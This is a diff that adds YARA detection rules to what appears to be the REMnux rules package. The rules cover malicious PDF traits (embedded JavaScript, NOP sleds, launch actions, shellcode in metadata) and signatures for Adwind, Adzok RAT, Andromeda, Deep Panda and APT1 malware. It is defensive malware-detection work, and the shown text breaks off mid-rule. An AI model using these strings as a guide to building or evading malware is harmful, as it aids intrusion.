+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 4
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		$header = /%PDF-1\.(3|4|6)/
+
+		$author0 = "Ubzg1QUbzuzgUbRjvcUb14RjUb1"
+		$author1 = "ser pes"
+		$author2 = "Miekiemoes"
+		$author3 = "Nsarkolke"
+	condition:
+		$magic at 0 and $header and 1 of ($author*)
+}
+
+rule suspicious_producer : PDF raw 
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 2
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		$header = /%PDF-1\.(3|4|6)/
+		
+		$producer0 = /Producer \(Scribus PDF Library/
+		$producer1 = "Notepad"
+	condition:
+		$magic at 0 and $header and 1 of ($producer*)
+}
+
+rule suspicious_creator : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 3
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		$header = /%PDF-1\.(3|4|6)/
+		
+		$creator0 = "yen vaw"
+		$creator1 = "Scribus"
+		$creator2 = "Viraciregavi"
+	condition:
+		$magic at 0 and $header and 1 of ($creator*)
+}
+
+rule possible_exploit : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 3
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		
+		$attrib0 = /\/JavaScript /
+		$attrib3 = /\/ASCIIHexDecode/
+		$attrib4 = /\/ASCII85Decode/
+
+		$action0 = /\/Action/
+		$action1 = "Array"
+		$shell = "A"
+		$cond0 = "unescape"
+		$cond1 = "String.fromCharCode"
+		
+		$nop = "%u9090%u9090"
+	condition:
+		$magic at 0 and (2 of ($attrib*)) or ($action0 and #shell > 10 and 1 of ($cond*)) or ($action1 and $cond0 and $nop)
+}
+
+rule shellcode_blob_metadata : PDF raw
+{
+        meta:
+                author = "Glenn Edwards (@hiddenillusion)"
+                version = "0.1"
+                description = "When there's a large Base64 blob inserted into metadata fields it often indicates shellcode to later be decoded"
+                weight = 4
+        strings:
+                $magic = { 25 50 44 46 }
+
+                $reg_keyword = /\/Keywords.?\(([a-zA-Z0-9]{200,})/ //~6k was observed in BHEHv2 PDF exploits holding the shellcode
+                $reg_author = /\/Author.?\(([a-zA-Z0-9]{200,})/
+                $reg_title = /\/Title.?\(([a-zA-Z0-9]{200,})/
+                $reg_producer = /\/Producer.?\(([a-zA-Z0-9]{200,})/
+                $reg_creator = /\/Creator.?\(([a-zA-Z0-9]{300,})/
+                $reg_create = /\/CreationDate.?\(([a-zA-Z0-9]{200,})/
+
+        condition:
+                $magic at 0 and 1 of ($reg*)
+}
+
+rule suspicious_js : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 3
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		
+		$attrib0 = /\/OpenAction /
+		$attrib1 = /\/JavaScript /
+
+		$js0 = "eval"
+		$js1 = "Array"
+		$js2 = "String.fromCharCode"
+		
+	condition:
+		$magic at 0 and all of ($attrib*) and 2 of ($js*)
+}
+
+rule suspicious_launch_action : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 2
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		
+		$attrib0 = /\/Launch/
+		$attrib1 = /\/URL /
+		$attrib2 = /\/Action/
+		$attrib3 = /\/F /
+
+	condition:
+		$magic at 0 and 3 of ($attrib*)
+}
+
+rule suspicious_embed : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		ref = "https://feliam.wordpress.com/2010/01/13/generic-pdf-exploit-hider-embedpdf-py-and-goodbye-av-detection-012010/"
+		weight = 2
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		
+		$meth0 = /\/Launch/
+		$meth1 = /\/GoTo(E|R)/ //means go to embedded or remote
+		$attrib0 = /\/URL /
+		$attrib1 = /\/Action/
+		$attrib2 = /\/Filespec/
+		
+	condition:
+		$magic at 0 and 1 of ($meth*) and 2 of ($attrib*)
+}
+
+rule suspicious_obfuscation : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 2
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		$reg = /\/\w#[a-zA-Z0-9]{2}#[a-zA-Z0-9]{2}/
+		
+	condition:
+		$magic at 0 and #reg > 5
+}
+
+rule invalid_XObject_js : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		description = "XObject's require v1.4+"
+		ref = "https://blogs.adobe.com/ReferenceXObjects/"
+		version = "0.1"
+		weight = 2
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		$ver = /%PDF-1\.[4-9]/
+		
+		$attrib0 = /\/XObject/
+		$attrib1 = /\/JavaScript/
+		
+	condition:
+		$magic at 0 and not $ver and all of ($attrib*)
+}
+
+rule invalid_trailer_structure : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 1
+		
+        strings:
+                $magic = { 25 50 44 46 }
+				// Required for a valid PDF
+                $reg0 = /trailer\r?\n?.*\/Size.*\r?\n?\.*/
+                $reg1 = /\/Root.*\r?\n?.*startxref\r?\n?.*\r?\n?%%EOF/
+
+        condition:
+                $magic at 0 and not $reg0 and not $reg1
+}
+
+rule multiple_versions : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+        description = "Written very generically and doesn't hold any weight - just something that might be useful to know about to help show incremental updates to the file being analyzed"		
+		weight = 0
+		
+        strings:
+                $magic = { 25 50 44 46 }
+                $s0 = "trailer"
+                $s1 = "%%EOF"
+
+        condition:
+                $magic at 0 and #s0 > 1 and #s1 > 1
+}
+
+rule js_wrong_version : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		description = "JavaScript was introduced in v1.3"
+		ref = "http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/pdf_reference_1-7.pdf"
+		version = "0.1"
+		weight = 2
+		
+        strings:
+                $magic = { 25 50 44 46 }
+				$js = /\/JavaScript/
+				$ver = /%PDF-1\.[3-9]/
+
+        condition:
+                $magic at 0 and $js and not $ver
+}
+
+rule JBIG2_wrong_version : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		description = "JBIG2 was introduced in v1.4"
+		ref = "http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/pdf_reference_1-7.pdf"
+		version = "0.1"
+		weight = 1
+		
+        strings:
+                $magic = { 25 50 44 46 }
+				$js = /\/JBIG2Decode/
+				$ver = /%PDF-1\.[4-9]/
+
+        condition:
+                $magic at 0 and $js and not $ver
+}
+
+rule FlateDecode_wrong_version : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		description = "Flate was introduced in v1.2"
+		ref = "http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/pdf_reference_1-7.pdf"
+		version = "0.1"
+		weight = 1
+		
+        strings:
+                $magic = { 25 50 44 46 }
+				$js = /\/FlateDecode/
+				$ver = /%PDF-1\.[2-9]/
+
+        condition:
+                $magic at 0 and $js and not $ver
+}
+
+rule embed_wrong_version : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		description = "EmbeddedFiles were introduced in v1.3"
+		ref = "http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/pdf_reference_1-7.pdf"
+		version = "0.1"
+		weight = 1
+		
+        strings:
+                $magic = { 25 50 44 46 }
+				$embed = /\/EmbeddedFiles/
+				$ver = /%PDF-1\.[3-9]/
+
+        condition:
+                $magic at 0 and $embed and not $ver
+}
+
+rule invalid_xref_numbers : PDF raw
+{
+        meta:
+			author = "Glenn Edwards (@hiddenillusion)"
+			version = "0.1"
+			description = "The first entry in a cross-reference table is always free and has a generation number of 65,535"
+			notes = "This can be also be in a stream..."
+			weight = 1
+		
+        strings:
+                $magic = { 25 50 44 46 }
+                $reg0 = /xref\r?\n?.*\r?\n?.*65535\sf/
+                $reg1 = /endstream.*\r?\n?endobj.*\r?\n?startxref/
+        condition:
+                $magic at 0 and not $reg0 and not $reg1
+}
+
+rule js_splitting : PDF raw
+{
+        meta:
+                author = "Glenn Edwards (@hiddenillusion)"
+                version = "0.1"
+                description = "These are commonly used to split up JS code"
+                weight = 2
+                
+        strings:
+                $magic = { 25 50 44 46 }
+				$js = /\/JavaScript/
+                $s0 = "getAnnots"
+                $s1 = "getPageNumWords"
+                $s2 = "getPageNthWord"
+                $s3 = "this.info"
+                                
+        condition:
+                $magic at 0 and $js and 1 of ($s*)
+}
+
+rule header_evasion : PDF raw
+{
+        meta:
+                author = "Glenn Edwards (@hiddenillusion)"
+                description = "3.4.1, 'File Header' of Appendix H states that ' Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.'  Therefore, if you see this trigger then any other rule looking to match the magic at 0 won't be applicable"
+                ref = "http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/pdf_reference_1-7.pdf"
+                version = "0.1"
+                weight = 3
+
+        strings:
+                $magic = { 25 50 44 46 }
+        condition:
+                $magic in (5..1024) and #magic == 1
+}
+
+rule BlackHole_v2 : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		ref = "http://fortknoxnetworks.blogspot.no/2012/10/blackhhole-exploit-kit-v-20-url-pattern.html"
+		weight = 3
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		$content = "Index[5 1 7 1 9 4 23 4 50"
+		
+	condition:
+		$magic at 0 and $content
+}
+
+
+rule XDP_embedded_PDF : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		ref = "http://blog.9bplus.com/av-bypass-for-malicious-pdfs-using-xdp"
+        weight = 1		
+
+	strings:
+		$s1 = "<pdf xmlns="
+		$s2 = "<chunk>"
+		$s3 = "</pdf>"
+		$header0 = "%PDF"
+		$header1 = "JVBERi0"
+
+	condition:
+		all of ($s*) and 1 of ($header*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Adwind_JAR_PACKA.yar remnux-rules-0.0.4/yara/malware/Adwind_JAR_PACKA.yar
--- remnux-rules-0.0.3/yara/malware/Adwind_JAR_PACKA.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Adwind_JAR_PACKA.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,19 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule Adwind_JAR_PACKA : binary 
+{
+ meta:
+  author = "Vitaly Kamluk, Vitaly.Kamluk@kaspersky.com"
+  reference = "https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf"
+  last_modified = "2015-11-30"
+ strings:
+  $b1 = ".class" ascii
+  $b2 = "c/a/a/" ascii
+  $b3 = "b/a/" ascii
+  $b4 = "a.dat" ascii
+  $b5 = "META-INF/MANIFEST.MF" ascii
+ condition:
+  int16(0) == 0x4B50 and ($b1 and $b2 and $b3 and $b4 and $b5)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Adwind_JAR_PACKB.yar remnux-rules-0.0.4/yara/malware/Adwind_JAR_PACKB.yar
--- remnux-rules-0.0.3/yara/malware/Adwind_JAR_PACKB.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Adwind_JAR_PACKB.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,17 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule Adwind_JAR_PACKB {
+ meta:
+  author = "Vitaly Kamluk, Vitaly.Kamluk@kaspersky.com"
+  reference = "https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf"
+  last_modified = "2015-11-30"
+ strings:
+  $c1 = "META-INF/MANIFEST.MF" ascii
+  $c2 = "main/Start.class" ascii
+  $a1 = "con g/con g.perl" ascii
+  $b1 = "java/textito.isn" ascii
+ condition:
+  int16(0) == 0x4B50 and ($c1 and $c2 and ($a1 or $b1))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Adzok_RAT.yar remnux-rules-0.0.4/yara/malware/Adzok_RAT.yar
--- remnux-rules-0.0.3/yara/malware/Adzok_RAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Adzok_RAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,28 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+rule Adzok : binary
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		Description = "Adzok Rat"
+		Versions = "Free 1.0.0.3,"
+		date = "2015/05"
+		ref = "http://malwareconfig.com/stats/Adzok"
+		maltype = "Remote Access Trojan"
+		filetype = "jar"
+
+	strings:
+		$a1 = "config.xmlPK"
+		$a2 = "key.classPK"
+		$a3 = "svd$1.classPK"
+		$a4 = "svd$2.classPK"
+    	$a5 = "Mensaje.classPK"
+		$a6 = "inic$ShutdownHook.class"
+		$a7 = "Uninstall.jarPK"
+		$a8 = "resources/icono.pngPK"
+        
+	condition:
+    7 of ($a*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Alina.yar remnux-rules-0.0.4/yara/malware/Alina.yar
--- remnux-rules-0.0.3/yara/malware/Alina.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Alina.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,18 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule alina : forensic pcap 
+{
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2014-08-09"
+        description = "Identify Alina"
+	strings:
+    	$s1 = "Alina v1.0"
+        $s2 = "POST"
+        $s3 = "1[0-2])[0-9]"
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Andromeda.yar remnux-rules-0.0.4/yara/malware/Andromeda.yar
--- remnux-rules-0.0.3/yara/malware/Andromeda.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Andromeda.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,17 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule andromeda : binary
+{
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2014-03-13"
+        description = "Identify Andromeda"
+    strings:
+        $config = {1c 1c 1d 03 49 47 46}
+        $c1 = "hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst"
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Anthem_DeepPanda.yar remnux-rules-0.0.4/yara/malware/Anthem_DeepPanda.yar
--- remnux-rules-0.0.3/yara/malware/Anthem_DeepPanda.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Anthem_DeepPanda.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,103 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+import "pe"
+
+
+/* Anthem Deep Panda APT */
+
+rule Anthem_DeepPanda_sl_txt_packed : binary 
+{
+	meta:
+		description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
+	strings:
+		$s0 = "Command line port scanner" fullword wide
+		$s1 = "sl.exe" fullword wide
+		$s2 = "CPports.txt" fullword ascii
+		$s3 = ",GET / HTTP/.}" fullword ascii
+		$s4 = "Foundstone Inc." fullword wide
+		$s9 = " 2002 Foundstone Inc." fullword wide
+		$s15 = ", Inc. 2002" fullword ascii
+		$s20 = "ICMP Time" fullword ascii
+	condition:
+		all of them
+}
+
+rule Anthem_DeepPanda_lot1 : binary
+{
+	meta:
+		description = "Anthem Hack Deep Panda - lot1.tmp-pwdump"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
+	strings:
+		$s0 = "Unable to open target process: %d, pid %d" fullword ascii
+		$s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+		$s2 = "Target: Failed to load SAM functions." fullword ascii
+		$s5 = "Error writing the test file %s, skipping this share" fullword ascii
+		$s6 = "Failed to create service (%s/%s), error %d" fullword ascii
+		$s8 = "Service start failed: %d (%s/%s)" fullword ascii
+		$s12 = "PwDump.exe" fullword ascii
+		$s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
+		$s14 = ":\\\\.\\pipe\\%s" fullword ascii
+		$s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
+		$s16 = "dump logon session" fullword ascii
+		$s17 = "Timed out waiting to get our pipe back" fullword ascii
+		$s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
+		$s20 = "%s\\%s.exe" fullword ascii
+	condition:
+		10 of them
+}
+
+rule Anthem_DeepPanda_htran_exe : binary
+{
+	meta:
+		description = "Anthem Hack Deep Panda - htran-exe"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
+	strings:
+		$s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
+		$s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" fullword ascii
+		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s5 = "[-] ERROR: Must supply logfile name." fullword ascii
+		$s6 = "[-] There is a error...Create a new connection." fullword ascii
+		$s7 = "[+] Accept a Client on port %d from %s" fullword ascii
+		$s8 = "======================== htran V%s =======================" fullword ascii
+		$s9 = "[-] Socket Listen error." fullword ascii
+		$s10 = "[-] ERROR: open logfile" fullword ascii
+		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s12 = "[+] Make a Connection to %s:%d ......" fullword ascii
+		$s14 = "Recv %5d bytes from %s:%d" fullword ascii
+		$s15 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s16 = "[+] Waiting another Client on port:%d...." fullword ascii
+		$s17 = "[+] Accept a Client on port %d from %s ......" fullword ascii
+		$s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+	condition:
+		10 of them
+}
+
+rule Anthem_DeepPanda_Trojan_Kakfum : binary
+{
+	meta:
+		description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
+		hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
+	strings:
+		$s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
+		$s1 = "%s\\sqlsrv32.dll" fullword ascii
+		$s2 = "%s\\sqlsrv64.dll" fullword ascii
+		$s3 = "%s\\%d.tmp" fullword ascii
+		$s4 = "ServiceMaix" fullword ascii
+		$s15 = "sqlserver" fullword ascii
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT1.yar remnux-rules-0.0.4/yara/malware/APT1.yar
--- remnux-rules-0.0.3/yara/malware/APT1.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT1.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,1242 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LIGHTDART_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "ret.log" wide ascii
+                $s2 = "Microsoft Internet Explorer 6.0" wide ascii
+                $s3 = "szURL Fail" wide ascii
+                $s4 = "szURL Successfully" wide ascii
+                $s5 = "%s&sdate=%04ld-%02ld-%02ld" wide ascii
+        condition:
+                all of them
+}
+
+rule AURIGA_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "superhard corp." wide ascii
+                $s2 = "microsoft corp." wide ascii
+                $s3 = "[Insert]" wide ascii
+                $s4 = "[Delete]" wide ascii
+                $s5 = "[End]" wide ascii
+                $s6 = "!(*@)(!@KEY" wide ascii
+                $s7 = "!(*@)(!@SID=" wide ascii
+        condition:
+                all of them
+}
+
+rule AURIGA_driver_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Services\\riodrv32" wide ascii
+                $s2 = "riodrv32.sys" wide ascii
+                $s3 = "svchost.exe" wide ascii
+                $s4 = "wuauserv.dll" wide ascii
+                $s5 = "arp.exe" wide ascii
+                $pdb = "projects\\auriga" wide ascii
+
+        condition:
+                all of ($s*) or $pdb
+}
+
+rule BANGAT_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "superhard corp." wide ascii
+                $s2 = "microsoft corp." wide ascii
+                $s3 = "[Insert]" wide ascii
+                $s4 = "[Delete]" wide ascii
+                $s5 = "[End]" wide ascii
+                $s6 = "!(*@)(!@KEY" wide ascii
+                $s7 = "!(*@)(!@SID=" wide ascii
+                $s8 = "end      binary output" wide ascii
+                $s9 = "XriteProcessMemory" wide ascii
+                $s10 = "IE:Password-Protected sites" wide ascii
+                $s11 = "pstorec.dll" wide ascii
+
+        condition:
+                all of them
+}
+
+rule BISCUIT_GREENCAT_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "zxdosml" wide ascii
+                $s2 = "get user name error!" wide ascii
+                $s3 = "get computer name error!" wide ascii
+                $s4 = "----client system info----" wide ascii
+                $s5 = "stfile" wide ascii
+                $s6 = "cmd success!" wide ascii
+
+        condition:
+                all of them
+}
+
+rule BOUNCER_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" wide ascii
+                $s2 = "IDR_DATA%d" wide ascii
+
+                $s3 = "asdfqwe123cxz" wide ascii
+                $s4 = "Mode must be 0(encrypt) or 1(decrypt)." wide ascii
+
+        condition:
+                ($s1 and $s2) or ($s3 and $s4)
+
+}
+
+rule BOUNCER_DLL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "new_connection_to_bounce():" wide ascii
+                $s2 = "usage:%s IP port [proxip] [port] [key]" wide ascii
+
+        condition:
+                all of them
+}
+
+rule CALENDAR_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "content" wide ascii
+                $s2 = "title" wide ascii
+                $s3 = "entry" wide ascii
+                $s4 = "feed" wide ascii
+                $s5 = "DownRun success" wide ascii
+                $s6 = "%s@gmail.com" wide ascii
+                $s7 = "<!--%s-->" wide ascii
+
+                $b8 = "W4qKihsb+So=" wide ascii
+                $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" wide ascii
+                $b10 = "8oqKiqb5880/uJLzAsY=" wide ascii
+
+        condition:
+                all of ($s*) or all of ($b*)
+}
+
+rule COMBOS_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" wide ascii
+                $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" wide ascii
+                $s3 = "Delay" wide ascii
+                $s4 = "Getfile" wide ascii
+                $s5 = "Putfile" wide ascii
+                $s6 = "---[ Virtual Shell]---" wide ascii
+                $s7 = "Not Comming From Our Server %s." wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule DAIRY_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" wide ascii
+                $s2 = "KilFail" wide ascii
+                $s3 = "KilSucc" wide ascii
+                $s4 = "pkkill" wide ascii
+                $s5 = "pklist" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule GLOOXMAIL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Kill process success!" wide ascii
+                $s2 = "Kill process failed!" wide ascii
+                $s3 = "Sleep success!" wide ascii
+                $s4 = "based on gloox" wide ascii
+
+                $pdb = "glooxtest.pdb" wide ascii
+
+        condition:
+                all of ($s*) or $pdb
+}
+
+rule GOGGLES_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Kill process success!" wide ascii
+                $s2 = "Kill process failed!" wide ascii
+                $s3 = "Sleep success!" wide ascii
+                $s4 = "based on gloox" wide ascii
+
+                $pdb = "glooxtest.pdb" wide ascii
+
+        condition:
+                all of ($s*) or $pdb
+}
+
+rule HACKSFASE1_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = {cb 39 82 49 42 be 1f 3a}
+
+        condition:
+                all of them
+}
+
+rule HACKSFASE2_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Send to Server failed." wide ascii
+                $s2 = "HandShake with the server failed. Error:" wide ascii
+                $s3 = "Decryption Failed. Context Expired." wide ascii
+
+        condition:
+                all of them
+}
+
+rule KURTON_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" wide ascii
+                $s2 = "!(*@)(!@PORT!(*@)(!@URL" wide ascii
+                $s3 = "MyTmpFile.Dat" wide ascii
+                $s4 = "SvcHost.DLL.log" wide ascii
+
+        condition:
+                all of them
+}
+
+rule LONGRUN_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" wide ascii
+                $s2 = "%s\\%c%c%c%c%c%c%c" wide ascii
+                $s3 = "wait:" wide ascii
+                $s4 = "Dcryption Error! Invalid Character" wide ascii
+
+        condition:
+                all of them
+}
+
+rule MACROMAIL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "svcMsn.dll" wide ascii
+                $s2 = "RundllInstall" wide ascii
+                $s3 = "Config service %s ok." wide ascii
+                $s4 = "svchost.exe" wide ascii
+
+        condition:
+                all of them
+}
+
+rule MANITSME_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Install an Service hosted by SVCHOST." wide ascii
+                $s2 = "The Dll file that to be released." wide ascii
+                $s3 = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
+                $s4 = "svchost.exe" wide ascii
+
+                $e1 = "Man,it's me" wide ascii
+                $e2 = "Oh,shit" wide ascii
+                $e3 = "Hallelujah" wide ascii
+                $e4 = "nRet == SOCKET_ERROR" wide ascii
+
+                $pdb1 = "rouji\\release\\Install.pdb" wide ascii
+                $pdb2 = "rouji\\SvcMain.pdb" wide ascii
+
+        condition:
+                (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2
+}
+
+rule MINIASP_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "miniasp" wide ascii
+                $s2 = "wakeup=" wide ascii
+                $s3 = "download ok!" wide ascii
+                $s4 = "command is null!" wide ascii
+                $s5 = "device_input.asp?device_t=" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule NEWSREELS_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" wide ascii
+                $s2 = "name=%s&userid=%04d&other=%c%s" wide ascii
+                $s3 = "download ok!" wide ascii
+                $s4 = "command is null!" wide ascii
+                $s5 = "noclient" wide ascii
